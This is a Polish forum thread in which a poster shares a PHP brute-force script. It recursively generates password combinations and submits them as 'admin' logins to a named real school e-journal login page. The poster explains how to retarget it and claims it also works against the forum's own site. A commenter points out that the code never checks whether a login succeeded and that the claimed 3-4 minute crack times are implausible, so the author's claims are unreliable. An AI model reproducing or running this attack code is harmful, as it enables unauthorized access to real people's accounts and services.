<?php include('sploit.php'); set_time_limit(0); @ob_end_flush(); if (!empty($_GET['INTRO'])) { $INTRO=$_GET['INTRO']; }else { $INTRO=''; } if (!empty($_GET['END'])) { $END=$_GET['END']; }else { $END="<br>"; } define('Intro',$INTRO); define('End',$END); function MakeWordList($min=1,$max=2,$chars= null ,$text='',$array= array()){ if ($chars== null){ $array=array(); for ($i=0;$i<=255;$i++){ $array[$i]=chr($i); } $chars=$array; } foreach ($chars as $id => $value){ if (strlen($text.$value)>=$min) { //$array[]=Intro.$text.$value.End; echo Intro.$text.$value.End; hack('lo50.nazwa.pl','/dziennik/prelogowanie.php',array('l ogin'=>'admin', 'haslo' => $text.$value),80); } if (strlen($text.$value)<$max) { MakeWordList(&$min,&$max,$chars,$text.$value,& $array); } } return $array; } if (isset($_GET['chars'])&&$_GET['chars']!='') { $chars=explode(":", $_GET['chars']); }else { $chars=''; } if (!isset($_GET['min'])or!is_numeric($_GET['min'])) { $min=''; }else { $min=$_GET['min']; } if (!isset($_GET['max'])or!is_numeric($_GET['max'])) { $max=''; }else { $max=$_GET['max']; } if (!isset($_GET['text'])) { $text=''; }else { $text=$_GET['text']; } if (isset($_GET['text'])) { MakeWordList($min,$max,$chars,$text); exit(); }else{ ?> <form method="GET"> minimum znaków: <br> <input type=" text" name="min" ><br> maximum znaków: <br> <input type="text" name="max" ><br> <hr> dozwolone znaki <small>oddziel : np a:b:1</small>(brak oznacza wszystkie elementy z kodu ascii)<br> <textarea name="chars" onclick="this.value=''">a:b:c:d:e:f:g:h:i:j:k:l:m:n:o:p:r:s:t :w:y:x:z:v:q:u:0:1:2:3:4:5:6:7:8:9</textarea><br><;hr> znak początkowy <input type=" text" value="" name="INTRO"><br> znak końcowy <input type="text" value="<br>" name="END"><br> rozpocząć wyrazy od <input type="text" name="text" value=""><br><hr> <input type="submit" value="generuj"> </form> <?php }?>
jak to działa ?? otoz w pliku sploit jest funkcja ktora wysyla zapytanie do serwera tak jakby sie chciala zalogowac , i pobiera odpowiedz,
w pliku exploit jest funkcja rekurencyjna ktora generuje wszystkie mozliwe kombinacje hasel z mozliwych...
to jest tak na szybko wienc ten kto chce to sobie poprawi!
podgląd można zobaczyc na: http://lo50i.nazwa.pl/exploit.php
acha w funkcji hack podajemy adres hosta , i adres pliku ;) :) jesli w formularzu potrzebna jest wieksza ilosc pol to dopisujemy je do arraya czyli robimy array(pole => 'wartosc').. ale chyba tego nie musze tlumaczyc...
zapraszam do tego artykułu a ten i inne na ten temat zamykam
http://nedds.pl/php-attack-t48526.html
http://haxite.org/index.php3?site=artykul&nx1=artykul_view&id=543
zamist
function hack($host='lo50.nazwa.pl',$file='/dziennik/prelogowanie.php',$a rray,$port=80){
ma byc
function hack($host='lo50.nazwa.pl',$file='/dziennik/prelogowanie.php',$array,$port=80){
niepotrzebne spacje w nazwie zmiennej
ten sposob jest bardzo wolny, gdyby haslo bylo 12345 to jeszcze przejdzie
przeszukiwania hasla np. think987 to juz tygodnie/miesiace ??
a jak przerwie wam polaczenie z netem w trakcie lamania i nie wiecie a czym skonczylo, to trzeba od poczatku, wiec 'lata' ;]
Tony sam to pisałeś ??
ok już poprawiłem...tak ten artykuł jest mój ale wcześniej był na haxite.org hohoho i jeszcze troche temu napisany i zaczeli pisać o tym to odnalazłem go i zapodałem. poza tym nie bede powtarzał to w nieskończoność te posty które pisze są sprawdzone a jak nie są pisane przeze mnie to najpierw je sprawdzam a potem dopiero opublikuje.
ten sposob jest bardzo wolny, gdyby haslo bylo 12345 to jeszcze przejdzie
przeszukiwania hasla np. think987 to juz tygodnie/miesiace ??
a jak przerwie wam polaczenie z netem w trakcie lamania i nie wiecie a czym skonczylo, to trzeba od poczatku, wiec 'lata' ;]
a z tym się nie zgodze ponieważ:
1) sprawdzane było na hasłach od 5 do 32 znaków !dowolnych! ( mówię tutaj o abc...123...~!@#$) + spacja i maksymalny czas odszukiwania wynosił 3-4 minut
2)wydaje mi się, że to jest optymalny kod na atak php bo jak w innym poście wspomniał thinkbot :" trzeba szukać dziur w kodzie" natomiast tutaj nie ma opcji żeby się kod nie "wyłożył". jak wspomniałem wcześniej testowane nie tylko na platformie typu Windows, ale też testowane na platformie Linuxowej t.j. SuSE, Debian, Slackware i FreeBSD.
Przypuszczam, że ten kod zadziałałby też na Nedds.pl z tego względu, że nie słyszałem i nie czytałe ponieważ nie znalazłem na żadnej stronie poprawki do tego.
[...]
1) sprawdzane było na hasłach od 5 do 32 znaków !dowolnych! ( mówię tutaj o abc...123...~!@#$) + spacja i maksymalny czas odszukiwania wynosił 3-4 minut
2)wydaje mi się, że to jest optymalny kod na atak php bo jak w innym poście wspomniał thinkbot :" trzeba szukać dziur w kodzie" natomiast tutaj nie ma opcji żeby się kod nie "wyłożył". jak wspomniałem wcześniej testowane nie tylko na platformie typu Windows, ale też testowane na platformie Linuxowej t.j. SuSE, Debian, Slackware i FreeBSD.
[...]
ohh, dup, to jest technicznie niemozliwe
tygodnie, miesiace, lata
jak byś to wyprobował to byś się nie kłócił...spróbuj to pogadamy...jak wynajdziesz lepszy sposób na to to napisz i wtedy ja wyraże się "krytycznie" na ten temat.
P.S. czytałeś komentaże do tego artykułu?? chyba nie każdy który się tam wypowiadał w 5-cio stopniowej skali dawał 6(tak na marginesie)
ja niestety wchodze w ftp ze skryptem :| po czym widze tylko jego kod... jak go uruchomic ?
jak byś to wyprobował to byś się nie kłócił...spróbuj to pogadamy...jak wynajdziesz lepszy sposób na to to napisz i wtedy ja wyraże się "krytycznie" na ten temat.
P.S. czytałeś komentaże do tego artykułu?? chyba nie każdy który się tam wypowiadał w 5-cio stopniowej skali dawał 6(tak na marginesie)
ech, nie umisz przyzac sie do bledow
if ( $fp = fsockopen($host, $port, $errno, $errstr, 1)) { [...] fwrite($fp, $out); echo "<hr><textarea rows=\"30\" cols=\"70\">$out2</textarea><br><textarea rows=\"30\" cols=\"70\">$out</textarea><br>"; $echo=''; while (!feof($fp)) { $echo .= fgets($fp, 128); } fclose($fp); echo '<textarea rows="30" cols="70">'.$echo."</textarea><br>$echo"; echo '<br><small>SUCCES</small><br><hr> '; }else{ echo '<br><small><font color="red">ERROR</font></small><br><hr& gt;'; }
w tym podobno twoim kodzie, nawet nie jest sprawdzany czy haslo jest dobre czy nie
haslo 'tony',
zakres znakow ze skryptu: a:b:c:d:e:f:g:h:i:j:k:l:m:n:o:p:r:s:t:w:y:x:z:v:q:u:0:1:2:3:4:5:6:7:8:9 = 36 znakow
36^4 = 1 679 616 kombinacji
zaleznie od predkosci serwera, powiedzmy ze jest 100/s zadan (co jest przesada 'lekka', wiekszosc serwerow ogranicza liczbe zadan od aplikacji)
wiec na sprawdzenie calego zakresu potrzeba ~280 minut
oczywiscie haslo 'tony' bedzie wczesniej, ale
"sprawdzane było na hasłach od 5 do 32 znaków !dowolnych! ( mówię tutaj o abc...123...~!@#$) + spacja i maksymalny czas odszukiwania wynosił 3-4 minut" - w 4 minuty ?
nie bardzo masz pojecie o czym piszesz, wiec nie sadze ze ten skrypt jest twoj
takich obliczen to w gimnazjum juz uczą, z profilu wynika ze 18
"P.S. czytałeś komentaże do tego artykułu?? chyba nie każdy który się tam wypowiadał w 5-cio stopniowej skali dawał 6(tak na marginesie)" - tu mialo byc bez 'nie' ? bo z 'nie', nie bardzo rozumie
dubel
buahahaha własnie widać jaki haker sie odezwał :lol: myślisz, że jak przepiszesz pare linijek kodu to jesteś fajny. radze najpierw sprawdzić a potem otwierać gębe w takich sprawach. z racji tego, że piszesz durne posty zamykam ten temat.
P.S. tak na marginesie to ten kod działa też na nedds ;) jak byś nie wiedział. napisz wkońcu jakiś post tego pokroju bo narazie to tylko krytykujesz wszystkich. aha jeszcze jedno jeszcze jeden post w stylu "ten kod jest do [cenzura]" albo "nie twój" bedzie podchodzić pod ban (patrz: administracja nedds.pl)